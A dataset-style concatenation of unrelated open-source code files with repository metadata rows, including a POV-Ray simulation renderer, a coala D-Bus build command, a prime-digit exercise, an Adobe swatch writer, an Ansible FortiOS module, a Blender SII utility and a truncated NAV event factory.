f.write(' texture { T_Ball_%d }\n'%(n))
f.write(' transform {\n')
f.write(' matrix <%f, %f, %f,\n'%(m[0], m[3], m[6]))
f.write(' %f, %f, %f,\n'%(m[1], m[4], m[7]))
f.write(' %f, %f, %f,\n'%(m[2], m[5], m[8]))
f.write(' %f, %f, %f> }\n'%(x/100.0, z/100.0, y/100.0))
f.write('}\n')
# now camera angle
# init: <0.17, 0.50, -1.10> <0.17, 0.50, 0.0>
# target: <0.17, 0.22, -0.28> <0.17, 0.15, 0.0>
# those are in POVRAY coordinates
# in simulation coordinates,
# init: <17, -110, 50> <17, 0, 50>
# target: <17, -28, 22> <17, 0, 15>
# diff < 0, 82, -28> < 0, 0, -35>
# let's say targe is reached in the first 200 steps
# d/step= < 0, .41,-.14> < 0, 0,-.175>
def move_camera (camera, lookat):
if (camera[2] <= 22.0): return
camera[1] += .41
camera[2] -= .14
lookat[2] -= .175
def usage():
print '$Id: stnc2pov.py,v 1.9 2008/06/03 02:57:43 kichiki Exp $'
print 'USAGE:'
print '\t-f or --file : stokes-nc-file'
print '\t-o or --out : output filename'
print '\t-ball : use pool balls'
print '\t-bonds : connect particles with bonds'
print '\t-br : radius of bond cylinder'
print '\t-bc : bond color (default: Red)\n'\
'\t\t ex.1 -bc \'rgb <0, .5, 1>\'\n'\
'\t\t ex.2 -bc \'color red 0.623529 green 0.623529 blue 0.372549\'\n'
print '\t-step n : output the config only at the step n\n'\
'\t\t n starts from 1 and ends at 1001 for 1000-step run.\n'
print '\t-nsteps n : output every n steps\n'
print '\t-sphere r : draw sphere with radius r'
print '\t-cylinder r : draw cylinder with radius r'
print '\t-camera r : set the distance to the camera by r'
print '\t-top : the top-view (default: side view)'
print '\t-bottom : the bottom-view (default: side view)'
print '\t-lookat x y z : set the lookat point fixed by (x,y,z)'
sys.exit ()
def render_one_step(str_argv, outfile, i,
nc, pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, lk_arg, camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb):
file = '%s-%05d.pov'%(outfile, i)
try:
f = open(file, 'w')
except IOError:
print 'cannot open', file
sys.exit()
# write argv[0]
f.write('/* generated for %d step by\n'%(i))
f.write(' * %s\n'%(str_argv))
f.write(' */\n')
stokes.stokes_nc_get_data (nc, "x", i, pos)
# set camera direction
(cx,cy,cz, lx,ly,lz) = bounding_box (nc.np, pos)
if flag_lookat == 0:
if cylinder_radius > 0.0:
# only x is adjustable
lk = [cx, 0, 0]
else:
lk = [cx, cy, cz]
else:
lk = [lk_arg[0], lk_arg[1], lk_arg[2]]
if camera_dir == 'top':
# top view
if camera_dist == 0.0:
if lx > ly:
l = lx
else:
l = ly
# prevent to go too far away
if l > 50: l = 50
camera = [lk[0], lk[1], lk[2]+2*l]
else:
camera = [lk[0], lk[1], lk[2]+camera_dist]
elif camera_dir == 'bottom':
# bottom view
if camera_dist == 0.0:
if lx > ly:
l = lx
else:
l = ly
# prevent to go too far away
if l > 50: l = 50
camera = [lk[0], lk[1], lk[2]-2*l]
else:
camera = [lk[0], lk[1], lk[2]-camera_dist]
else:
# side view
if camera_dist == 0.0:
if lx > lz:
l = lx
else:
l = lz
# prevent to go too far away
if l > 50: l = 50
camera = [lk[0], lk[1]-2*l, lk[2]]
else:
camera = [lk[0], lk[1]-camera_dist, lk[2]]
# write header part
if lattice[0] == 0.0 and lattice[1] == 0.0 and lattice[2] == 0.0:
# non-periodic boundary
write_pov_header_open (f, lattice, camera, lk,
flag_ball, flag_bonds, bond_color)
else:
# periodic boundary
#move_camera (camera, lk)
write_pov_header (f, lattice, camera, lk,
flag_ball, flag_bonds, bond_color)
if flag_bb != 0:
# write bounding box for periodic system
if lattice[0] != 0.0 or lattice[1] != 0.0 or lattice[2] != 0.0:
f.write('box {\n')
f.write(' <0, 0, 0>,\n')
f.write(' <%f, %f, %f>\n'\
%(lattice[0]/100.0, lattice[2]/100.0, lattice[1]/100.0))
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
# write confinement
if sphere_radius > 0.0:
# draw sphere
f.write('sphere {\n')
f.write(' <0, 0, 0>, %f\n'%(sphere_radius/100.0)) # scale factor 100
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
if cylinder_radius > 0.0:
# draw cylinder
f.write('cylinder {\n')
f.write(' <%f, 0, 0>,\n'%((cx-lx)*0.01)) # scale factor 0.01
f.write(' <%f, 0, 0>,\n'%((cx+lx)*0.01)) # scale factor 0.01
f.write(' %f\n'%(cylinder_radius*0.01)) # scale factor 0.01
f.write(' pigment {\n')
f.write(' rgbf <.9,1,.9, .95>\n')
f.write(' }\n')
f.write(' finish {\n')
f.write(' ambient .2\n')
f.write(' diffuse .6\n')
f.write(' }\n')
f.write('}\n')
# write mobile particles
if flag_bonds == 0:
# no bond
if nc.flag_q != 0:
# with quaternion
stokes.stokes_nc_get_data (nc, "q", i, q)
for j in range(nc.np):
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
if a != []:
rad = a[j]
else:
rad = 1.0
if flag_ball == 0:
write_pov_particle_Q (f, x, y, z, rad,\
[q[j*4+0],q[j*4+1],\
q[j*4+2],q[j*4+3]])
else:
write_pov_particle_Balls_Q (f, x, y, z, rad,\
[q[j*4+0],q[j*4+1],\
q[j*4+2],q[j*4+3]],\
j)
else:
# no quaternion
for j in range(nc.np):
x = pos[j*3]
y = pos[j*3+1]
z = pos[j*3+2]
if a != []:
write_pov_particle (f, x, y, z, a[j])
else:
write_pov_particle (f, x, y, z, 1.0)
else:
# bond
write_pov_particles_with_bonds (f, nc.np, pos, a, bond_radius)
# write fixed particles
for j in range(nc.npf):
x = xf0[j*3]
y = xf0[j*3+1]
z = xf0[j*3+2]
if af != []:
write_pov_particle_fixed (f, x, y, z, af[j])
else:
write_pov_particle_fixed (f, x, y, z, 1.0)
# done
f.close()
def main():
filename = ''
outfile = ''
flag_ball = 0
flag_bonds = 0
bond_radius = 0.0
bond_color = ''
sphere_radius = 0.0
cylinder_radius = 0.0
flag_bb = 0
camera_dist = 0.0
flag_lookat = 0
lk_x = 0.0
lk_y = 0.0
lk_z = 0.0
camera_dir = ''
step = -1
nsteps = 1
nm = 0
i = 1
while i < len(sys.argv):
if sys.argv[i] == '-f' or sys.argv[i] == '--file':
filename = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-o' or sys.argv[i] == '--out':
outfile = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-step':
step = int(sys.argv[i+1])
step -= 1
i += 2
elif sys.argv[i] == '-nsteps':
nsteps = int(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-ball':
flag_ball = 1
i += 1
elif sys.argv[i] == '-bonds':
flag_bonds = 1
i += 1
elif sys.argv[i] == '-br':
bond_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-bc':
bond_color = sys.argv[i+1]
i += 2
elif sys.argv[i] == '-sphere':
sphere_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-cylinder':
cylinder_radius = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-bbox':
flag_bb = 1
i += 1
elif sys.argv[i] == '-camera':
camera_dist = float(sys.argv[i+1])
i += 2
elif sys.argv[i] == '-top':
camera_dir = 'top'
i += 1
elif sys.argv[i] == '-bottom':
camera_dir = 'bottom'
i += 1
elif sys.argv[i] == '-lookat':
flag_lookat = 1
lk_x = float(sys.argv[i+1])
lk_y = float(sys.argv[i+2])
lk_z = float(sys.argv[i+3])
i += 4
else:
usage()
if filename == '': usage()
if outfile == '': outfile = 'test'
str_argv = ''
for i in range(len(sys.argv)):
str_argv += ' %s'%(sys.argv[i])
nc = stokes.stokes_nc_open (filename)
#stokes.stokes_nc_print_actives(nc, stokes.get_stdout())
lattice = stokes.darray(3)
stokes.stokes_nc_get_array1d (nc, 'l', lattice)
# x[] : center of particles
pos = stokes.darray(nc.np * nc.nvec)
# q[] : quaternion
if nc.flag_q != 0:
q = stokes.darray(nc.np * nc.nquat)
else:
q = []
# a[] : radius of mobile particles
if nc.flag_a != 0:
a = stokes.darray(nc.np)
stokes.stokes_nc_get_array1d (nc, "a", a)
else:
a = []
# af[] : radius of fixed particles
if nc.flag_af != 0:
af = stokes.darray(nc.npf)
stokes.stokes_nc_get_array1d (nc, "af", af)
else:
af = []
# xf0[]
if nc.npf > 0:
xf0 = stokes.darray(nc.npf * nc.nvec)
stokes.stokes_nc_get_data0 (nc, "xf0", xf0)
else:
xf0 = []
if lattice[0] != 0.0 or lattice[1] != 0.0 or lattice[2] != 0.0:
# periodic boundary
if lattice[0] > lattice[2]:
l = lattice[0]
else:
l = lattice[2]
#camera = [0.5 * lattice[0], -1.7*l, 0.5 * lattice[2]]
#camera = [0.5 * lattice[0], -1.1*l, 0.5 * lattice[2]]
#lookat = [0.5 * lattice[0], 0.0, 0.5 * lattice[2]]
camera = [0.5 * lattice[0], -0.8*l, 0.28 * lattice[2]]
lookat = [0.5 * lattice[0], 0.0, 0.3 * lattice[2]]
# extract the config at the step
if step >= 0:
if step > nc.ntime:
print 'out of the range %d <= %d'%(step, nc.ntime)
sys.exit(1)
render_one_step(str_argv, outfile, step, nc,
pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, (lk_x, lk_y, lk_z),
camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb)
else:
nloop = nc.ntime / nsteps
for i in range(nloop):
ii = i * nsteps
print '%d step'%(ii)
render_one_step(str_argv, outfile, ii, nc,
pos, a, q, xf0, af, lattice,
flag_ball, flag_bonds, bond_radius, bond_color,
flag_lookat, (lk_x, lk_y, lk_z),
camera_dist, camera_dir,
sphere_radius, cylinder_radius, flag_bb)
if __name__ == "__main__":
main()
|
gpl-2.0
| 2,668,609,146,056,144,000
| 30.730627
| 79
| 0.43571
| false
| 2.906377
| false
| false
| false
|
Tanmay28/coala
|
coalib/output/dbus/BuildDbusService.py
|
1
|
1436
|
from distutils.core import Command
from distutils.errors import DistutilsOptionError
from coalib.misc.Constants import Constants
class BuildDbusService(Command):
"""
Add a `build_dbus` command to your setup.py.
To use this Command class add a command to call this class::
# For setuptools
setup(
entry_points={
"distutils.commands": [
"build_dbus = "
"coalib.misc.BuildDbusService:BuildDbusService"
]
}
)
# For distutils
from coalib.misc.BuildDbusService import BuildDbusService
setup(
cmdclass={'build_dbus': BuildDbusService}
)
You can then use the following setup command to produce a dbus service::
$ python setup.py build_dbus
"""
user_options = [('output=', 'O', 'output file')]
def initialize_options(self):
self.output = None
def finalize_options(self):
if self.output is None:
raise DistutilsOptionError('\'output\' option is required')
self.announce('Writing dbus service %s' % self.output)
def run(self):
dist = self.distribution
dbus_service = ("[D-BUS Service]\n"
"Names=" + Constants.BUS_NAME + "\n"
"Exec=coala-dbus")
with open(self.output, 'w') as f:
f.write(dbus_service)
|
agpl-3.0
| 1,617,566,290,701,137,700
| 27.72
| 76
| 0.571727
| false
| 4.432099
| false
| false
| false
|
jorgebaier/iic1103-s4-2016
|
clase0830/suma_digitos_primos.py
|
1
|
1132
|
import math
def suma_digitos(numero):
suma = 0
while numero > 0:
suma = suma + numero%10
numero = numero // 10
return suma
def esPrimo(n):
i = 1
divisores = 0
while i <= n:
if n%i == 0:
divisores = divisores + 1
i = i + 1
return divisores == 2
def esPrimo2(n):
i = 2
if n < 2:
return False
while i < n:
if n%i == 0:
return False
i = i + 1
return True
def esPrimo3(n):
i = 2
if n < 2:
return False
while i <= math.sqrt(n):
if n%i == 0:
return False
i = i + 1
return True
def esPrimo4(n):
if n < 2:
return False
elif n == 2:
return True
if n%2 == 0:
return False
i = 3
while i <= math.sqrt(n):
if n%i == 0:
return False
i = i + 2
return True
limite = int(input("cuantos numeros quieres? "))
numero = 0
contador = 0
while contador < limite:
suma = suma_digitos(numero)
if esPrimo3(suma):
print(numero)
contador = contador + 1
numero = numero + 1
|
unlicense
| -9,141,152,381,898,231,000
| 16.6875
| 48
| 0.484982
| false
| 3.118457
| false
| false
| false
|
nsfmc/swatch
|
swatch/writer.py
|
1
|
4463
|
# encoding: utf-8
"""
swatch, a parser for adobe swatch exchange files
Copyright (c) 2014 Marcos A Ojeda http://generic.cx/
With notes from
http://iamacamera.org/default.aspx?id=109 and
http://www.colourlovers.com/ase.phps
All Rights Reserved
MIT Licensed, see LICENSE.TXT for details
"""
import logging
import struct
import os
def chunk_count(swatch):
"""return the number of byte-chunks in a swatch object
this recursively walks the swatch list, returning 1 for a single color &
returns 2 for each folder plus 1 for each color it contains
"""
if type(swatch) is dict:
if 'data' in swatch:
return 1
if 'swatches' in swatch:
return 2 + len(swatch['swatches'])
else:
return sum(map(chunk_count, swatch))
def chunk_for_object(obj):
type = obj.get('type')
if type == 'Color Group':
return chunk_for_folder(obj)
if type in ['Process', 'Spot', 'Global']:
return chunk_for_color(obj)
def chunk_for_color(obj):
"""builds up a byte-chunk for a color
the format for this is
b'\x00\x01' +
Big-Endian Unsigned Int == len(bytes that follow in this block)
• Big-Endian Unsigned Short == len(color_name)
in practice, because utf-16 takes up 2 bytes per letter
this will be 2 * (len(name) + 1)
so a color named 'foo' would be 8 bytes long
• UTF-16BE Encoded color_name terminated with '\0'
using 'foo', this yields '\x00f\x00o\x00o\x00\x00'
• A 4-byte char for Color mode ('RGB ', 'Gray', 'CMYK', 'LAB ')
note the trailing spaces
• a variable-length number of 4-byte length floats
this depends entirely on the color mode of the color.
• A Big-Endian short int for either a global, spot, or process color
global == 0, spot == 1, process == 2
the chunk has no terminating string although other sites have indicated
that the global/spot/process short is a terminator, it's actually used
to indicate how illustrator should deal with the color.
"""
title = obj['name'] + '\0'
title_length = len(title)
chunk = struct.pack('>H', title_length)
chunk += title.encode('utf-16be')
mode = obj['data']['mode'].encode()
values = obj['data']['values']
color_type = obj['type']
fmt = {b'RGB': '!fff', b'Gray': '!f', b'CMYK': '!ffff', b'LAB': '!fff'}
if mode in fmt:
padded_mode = mode.decode().ljust(4).encode()
chunk += struct.pack('!4s', padded_mode) # the color mode
chunk += struct.pack(fmt[mode], *values) # the color values
color_types = ['Global', 'Spot', 'Process']
if color_type in color_types:
color_int = color_types.index(color_type)
chunk += struct.pack('>h', color_int) # append swatch mode
chunk = struct.pack('>I', len(chunk)) + chunk # prepend the chunk size
return b'\x00\x01' + chunk # swatch color header
def chunk_for_folder(obj):
"""produce a byte-chunk for a folder of colors
the structure is very similar to a color's data:
• Header
b'\xC0\x01' +
Big Endian Unsigned Int == len(Bytes in the Header Block)
note _only_ the header, this doesn't include the length of color data
• Big Endian Unsigned Short == len(Folder Name + '\0')
Note that Folder Name is assumed to be utf-16be so this
will always be an even number
• Folder Name + '\0', encoded UTF-16BE
• body
chunks for each color, see chunk_for_color
• folder terminator
b'\xC0\x02' +
b'\x00\x00\x00\x00'
Perhaps the four null bytes represent something, but i'm pretty sure
they're just a terminating string, but there's something nice about
how the b'\xC0\x02' matches with the folder's header
"""
title = obj['name'] + '\0'
title_length = len(title)
chunk_body = struct.pack('>H', title_length) # title length
chunk_body += title.encode('utf-16be') # title
chunk_head = b'\xC0\x01' # folder header
chunk_head += struct.pack('>I', len(chunk_body))
# precede entire chunk by folder header and size of folder
chunk = chunk_head + chunk_body
chunk += b''.join([chunk_for_color(c) for c in obj['swatches']])
chunk += b'\xC0\x02' # folder terminator chunk
chunk += b'\x00\x00\x00\x00' # folder terminator
return chunk
|
mit
| -4,765,099,113,358,125,000
| 35.719008
| 79
| 0.622327
| false
| 3.583065
| false
| false
| false
|
amenonsen/ansible
|
lib/ansible/modules/network/fortios/fortios_system_replacemsg_nac_quar.py
|
1
|
10019
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_system_replacemsg_nac_quar
short_description: Replacement messages in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS device by allowing the
user to set and modify system_replacemsg feature and nac_quar category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
choices:
- present
- absent
system_replacemsg_nac_quar:
description:
- Replacement messages.
default: null
type: dict
suboptions:
buffer:
description:
- Message string.
type: str
format:
description:
- Format flag.
type: str
choices:
- none
- text
- html
- wml
header:
description:
- Header flag.
type: str
choices:
- none
- http
- 8bit
msg_type:
description:
- Message type.
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Replacement messages.
fortios_system_replacemsg_nac_quar:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
system_replacemsg_nac_quar:
buffer: "<your_own_value>"
format: "none"
header: "none"
msg_type: "<your_own_value>"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_system_replacemsg_nac_quar_data(json):
option_list = ['buffer', 'format', 'header',
'msg_type']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
if isinstance(data, list):
for elem in data:
elem = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def system_replacemsg_nac_quar(data, fos):
vdom = data['vdom']
state = data['state']
system_replacemsg_nac_quar_data = data['system_replacemsg_nac_quar']
filtered_data = underscore_to_hyphen(filter_system_replacemsg_nac_quar_data(system_replacemsg_nac_quar_data))
if state == "present":
return fos.set('system.replacemsg',
'nac-quar',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('system.replacemsg',
'nac-quar',
mkey=filtered_data['msg-type'],
vdom=vdom)
def is_successful_status(status):
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_system_replacemsg(data, fos):
if data['system_replacemsg_nac_quar']:
resp = system_replacemsg_nac_quar(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"system_replacemsg_nac_quar": {
"required": False, "type": "dict", "default": None,
"options": {
"buffer": {"required": False, "type": "str"},
"format": {"required": False, "type": "str",
"choices": ["none", "text", "html",
"wml"]},
"header": {"required": False, "type": "str",
"choices": ["none", "http", "8bit"]},
"msg_type": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_system_replacemsg(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
|
gpl-3.0
| -8,324,616,875,064,963,000
| 28.72997
| 113
| 0.584489
| false
| 4.167637
| false
| false
| false
|
SCSSoftware/BlenderTools
|
addon/io_scs_tools/internals/containers/sii.py
|
1
|
7631
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Copyright (C) 2013-2017: SCS Software
import os
from io_scs_tools.utils import path as _path_utils
from io_scs_tools.utils.printout import lprint
from io_scs_tools.internals.containers.parsers import sii as _sii_reader
from io_scs_tools.internals.containers.writers import sii as _sii_writer
def get_data_from_file(filepath, is_sui=False):
"""Returns entire data in data container from specified SII definition file.
:param filepath: absolute file path where SII should be read from
:type filepath: str
:param is_sui: True if file should be read as SUI, in that case only one unit will be returned
:type is_sui: bool
:return: list of SII Units if parsing succeded; otherwise None
:rtype: list[io_scs_tools.internals.structure.UnitData] | None
"""
container = None
if filepath:
if os.path.isfile(filepath):
container = _sii_reader.parse_file(filepath, is_sui=is_sui)
if container:
if len(container) < 1:
lprint('D SII file "%s" is empty!', (_path_utils.readable_norm(filepath),))
return None
else:
lprint('D SII file "%s" is empty!', (_path_utils.readable_norm(filepath),))
return None
else:
lprint('W Invalid SII file path %r!', (_path_utils.readable_norm(filepath),))
else:
lprint('I No SII file path provided!')
return container
def write_data_to_file(filepath, container, is_sui=False, create_dirs=False):
"""Write given unit data container into SII file.
:param filepath: absolute file path where SII should be written to
:type filepath: str
:param container: iterable of unit data objects to be written
:type container: tuple[io_scs_tools.internals.structure.UnitData]|list[io_scs_tools.internals.structure.UnitData]
:param is_sui: True if unit should be written as SUI, meaning without SiiNunit header
:type is_sui: bool
:param create_dirs: True if directories should be created before export
:type create_dirs: bool
:return: True if container was successfully written; otherwise False
:rtype: bool
"""
file_type = "SUI" if is_sui else "SII"
if filepath:
if container:
return _sii_writer.write_data(filepath, container, is_sui=is_sui, create_dirs=create_dirs)
else:
lprint("W Empty %s container, abort file write: %r!", (file_type, _path_utils.readable_norm(filepath),))
else:
lprint('I No %s file path provided!', (file_type,))
return False
def has_valid_unit_instance(container, unit_type, req_props=tuple(), one_of_props=tuple(), unit_instance=0):
"""Valides unit instance with given unit type, required properties and one of properties lists.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
:param unit_type: type of the unit we are validating represented in string
:type unit_type: str
:param req_props: required properties that has to be inside unit instance to be valid
:type req_props: iterable
:param one_of_props: one of properties from this list has to be inside unit instance to be valid
:type one_of_props: iterable
:param unit_instance: index of unit instance in container list that we are validating
:type unit_instance: int
:return: True if valid; False otherwise
:rtype: bool
"""
if container is None:
lprint("D Validation failed: None SII container!")
return False
# there should be only one unit instance inside file
if len(container) < unit_instance + 1:
lprint("D Validation failed: Not enough unit instances!")
return False
# invalid unit type
if unit_type != "" and container[unit_instance].type != unit_type:
lprint("D Validation failed: Invalid unit instance type!")
return False
for prop in req_props:
if prop not in container[unit_instance].props:
lprint("D Validation failed: Required prop %r not found!", (prop,))
return False
one_of_props_found = False
for prop in one_of_props:
if prop in container[unit_instance].props:
one_of_props_found = True
break
if not one_of_props_found and len(one_of_props) > 0:
lprint("D Validation failed: None property found from one of: %r!", (one_of_props,))
return False
return True
def get_unit_property(container, prop, unit_instance=0):
"""Gets property value from unit instance.
NOTE: No validation is done if unit instance exists in container,
so make sure to use validation function before.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
:param prop: name of the property we are looking for
:type prop: str
:param unit_instance: index of unit instance in container list that we are validating
:type unit_instance: int
:return: None if property is not found insde unit instance; otherwise value of the property
:rtype: None|any
"""
value = None
if prop in container[unit_instance].props:
value = container[unit_instance].props[prop]
return value
def get_direct_unit_property(unit, prop):
"""Gets property value from unit instance.
NOTE: No validation is done if unit instance exists in container,
so make sure to use validation function before.
:param unit: container as list of unit instances
:type unit: io_scs_tools.internals.structure.UnitData
:param prop: name of the property we are looking for
:type prop: str
:return: None if property is not found insde unit instance; otherwise value of the property
:rtype: None|any
"""
value = None
if prop in unit.props:
value = unit.props[prop]
return value
def get_unit_by_id(container, unit_id, unit_type):
"""Gets first found unit instance from container with given id and type.
:param container: container as list of unit instances
:type container: list[io_scs_tools.internals.structure.UnitData]
:param unit_id: id of the unit we are searching for eg ".truck.cabin"
:type unit_id: str
:param unit_type: type of the unit representing it's class name we are searching for
:type unit_type: str
:return: None if unit is not found; otherwise unit data representation of it's content
:rtype: None|io_scs_tools.internals.structure.UnitData
"""
unit = None
for unit_instance in range(0, len(container)):
if container[unit_instance].type != unit_type:
continue
if container[unit_instance].id != unit_id:
continue
unit = container[unit_instance]
break
return unit
|
gpl-2.0
| -3,206,173,954,677,148,700
| 36.406863
| 117
| 0.68261
| false
| 3.966216
| false
| false
| false
|
hmpf/nav
|
python/nav/event2.py
|
2
|
3807
|
#
# Copyright (C) 2015 Uninett AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details. You should have received a copy of the GNU General Public License
# along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""
Next generation event factory functionality for NAV, based on the Django ORM
models from nav.models.event.
"""
from __future__ import absolute_import
from django.utils import six
from nav.models.event import EventQueue
class EventFactory(object):
"""A factory for NAV event dispatching"""
def __init__(self, source, target, event_type,
start_type=None, end_type=None):
"""
Initialize a template for event generation.
:param source: An event source string (e.g. 'ipdevpoll')
:param target: An event target string (e.g. 'eventEngine')
:param event_type: An event type name.
:param start_type: An optional start alert type hint for eventengine
:param end_type: An optional end alert type hint for eventengine
"""
self.source = source
self.target = target
self.event_type = event_type
self.start_type = start_type
self.end_type = end_type
def base(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns an event base template
:param device: A nav.models.manage.Device object or primary key.
:param netbox: A nav.models.manage.Netbox object or primary key.
:param subid: A subid string, if applicable.
:param varmap: A dictionary of arbitrary event variables to attach.
:param alert_type: An option alert type hint for eventEngine; useful
for cases where eventEngine has no specific plugin.
:return:
"""
event = EventQueue()
event.source_id = self.source
event.target_id = self.target
event.event_type_id = self.event_type
if isinstance(device, int):
event.device_id = device
else:
event.device = device
if isinstance(netbox, int):
event.netbox_id = netbox
else:
event.netbox = netbox
event.subid = six.text_type(subid)
var = dict(varmap or {})
if alert_type:
var['alerttype'] = alert_type
event.varmap = var
return event
def start(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns a start event"""
event = self.base(device, netbox, subid, varmap,
alert_type or self.start_type)
event.state = event.STATE_START
return event
def end(self, device=None, netbox=None, subid='', varmap=None,
alert_type=None):
"""Creates and returns an end event"""
